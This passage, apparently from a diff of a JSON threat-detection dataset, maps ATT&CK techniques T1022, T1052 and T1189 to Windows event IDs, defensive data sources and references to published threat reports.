"https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.docker.com/engine/api/v1.41/#tag/Container" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1022", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "Binary file metadata" + ], + [ + "IDS/IPS" + ], + [ + "DLP" + ], + [ + "Network protocol analysis" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD B9", + "Binary file metadata" + ], + [ + "IDS/IPS" + ], + [ + "DLP" + ], + [ + "Network protocol analysis" + ] + ], + "external_reference": [ + "https://www.justice.gov/opa/press-release/file/1121706/download", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.secureworks.com/research/bronze-union", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + ] + }, + { + "technique_id": "T1052", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4657", + "Registry - USB Keys" + ], + [ + "219", + " 441", + "Registry - USB/PnP IDs" + ], + [ + "Data loss prevention" + ], + [ + "File monitoring" + ], + [ + "4657", + "Registry", + "USB Keys" + ], + [ + "219", + "USB/PnP IDs" + ], + [ + "4663", + "File monitoring" + ], + [ + "Data loss prevention" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive creation", + "description": "A drive was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "drive" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1189", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Web proxy" + ], + [ + "Network intrusion detection system" + ], + [ + "SSL/TLS inspection" + ], + [ + "Packet capture" + ], + [ + "Network device logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Web proxy" + ], + [ + "Network intrusion detection system" + ], + [ + "SSL/TLS inspection" + ], + [ + "Packet capture" + ], + [ + "Network device logs" + ], + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + 